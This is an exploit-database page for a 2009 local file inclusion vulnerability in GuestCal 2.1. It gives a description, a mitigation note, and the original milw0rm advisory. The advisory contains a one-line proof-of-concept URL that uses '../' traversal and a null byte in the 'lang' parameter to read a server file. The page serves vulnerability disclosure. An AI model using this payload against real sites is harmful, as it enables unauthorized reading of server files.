header-logo
Suggest Exploit
vendor:
GuestCal
by:
SirGod
7,5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: GuestCal
Affected Version From: 2.1
Affected Version To: 2.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

GuestCal 2.1 (index.php lang) Local File Inclusion Vulnerability

GuestCal 2.1 is vulnerable to a local file inclusion vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal characters (e.g. '../') to the vulnerable application. This can allow an attacker to include arbitrary files from the web server's file system, such as the BOOTSECT.BAK file, which can be used to gain access to the system.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.
Source

Exploit-DB raw data:

##################################################################################
[+] GuestCal 2.1 (index.php lang) Local File Inclusion Vulnerability
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
##################################################################################

[+] Download script : http://guestcal.com/de/download

[+] Local File Inclusion

 - PoC :

 http://127.0.0.1/index.php?year=2009&object=1&lang=../../../../../BOOTSECT.BAK%00

##################################################################################

# milw0rm.com [2009-04-14]

Navigation

Suggest Exploit

Services By CQR